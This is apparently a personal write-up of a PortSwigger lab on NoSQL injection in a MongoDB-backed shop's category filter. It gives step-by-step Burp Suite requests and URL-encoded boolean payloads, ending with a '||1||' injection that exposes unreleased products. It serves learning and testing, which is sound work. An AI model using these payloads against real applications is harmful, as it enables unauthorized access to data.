[This lab demonstrates](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection) a classic **NoSQL injection vulnerability** in a MongoDB-backed application. The category filter endpoint takes user input and embeds it in a backend query **without sanitization**, allowing an attacker to inject JavaScript-based logic to **bypass filters** and **view unauthorized data** — in this case, unreleased products. --- ## Vulnerability Overview: NoSQL Injection in MongoDB MongoDB queries are often constructed using **JavaScript-like syntax**, such as: ```js db.products.find({ category: userInput }) ``` If `userInput` is not properly sanitized, an attacker can inject **logical operators**, such as `|| 1 ||`, to alter query behavior. This vulnerability arises from: - Unsafe string concatenation or dynamic query construction - Direct embedding of user-controlled values into queries - Lack of input validation or encoding ##### Step 1: Trigger the Category Filter and Inspect the Request In Burp’s browser: - Clicked on a **product category** (e.g., “Gifts”) - In **Proxy > HTTP history**, captured: ```http GET /?category=Gifts ``` Sent this to Repeater for testing. --- ##### Step 2: Test for JavaScript Injection Behavior Modified the parameter: ```http GET /?category=Gifts' ``` → Response contained a **JavaScript syntax error** ✅ Indicates that the input is **injected into a JS-based query**, consistent with MongoDB behavior ![[CleanShot 2025-04-14 at 20.10.32.png]] --- ##### Step 3: Test Valid JS Injection Payload Tried: ```http GET /?category=Gifts'+' ``` URL-encoded as: ``` Gifts%27+%27 ``` → No syntax error → confirms payload was accepted as part of a larger string --- ##### Step 4: Inject a Boolean False Condition Injected: ``` Gifts' && 0 && 'x ``` Encoded as: ``` Gifts%27%20%26%26%200%20%26%26%20%27x ``` → Response: **no products returned** ✅ Confirms logical condition injection is working --- ##### Step 5: Inject a Boolean True Condition Injected: ``` Gifts' && 1 && 'x ``` Encoded as: ``` Gifts%27%20%26%26%201%20%26%26%20%27x ``` → Response: products from the **Gifts** category returned ✅ Confirms boolean logic is being evaluated server-side --- ##### Step 6: Inject a Universal Truth to Bypass Filtering Final payload: ```http Gifts'||1||' ``` Encoded as: ``` Gifts%27%7C%7C1%7C%7C%27 ``` → Response: includes **Gifts** products **and** unreleased products ✅ Vulnerability successfully exploited Right-clicked response → **Show in browser** → Verified: **unreleased products are now visible** --- ### Quick Burp Tip: Fully URL-Encode Payloads To safely encode special characters (like `'`, `|`, or spaces) for injections: 1. **Highlight** your payload in the request. 2. **Right-click** → **Convert selection → URL → URL-encode all characters** ✅ This ensures _everything_ is percent-encoded — perfect for NoSQLi, XSS, and other injection payloads. ![[CleanShot 2025-04-14 at 20.29.53.png]]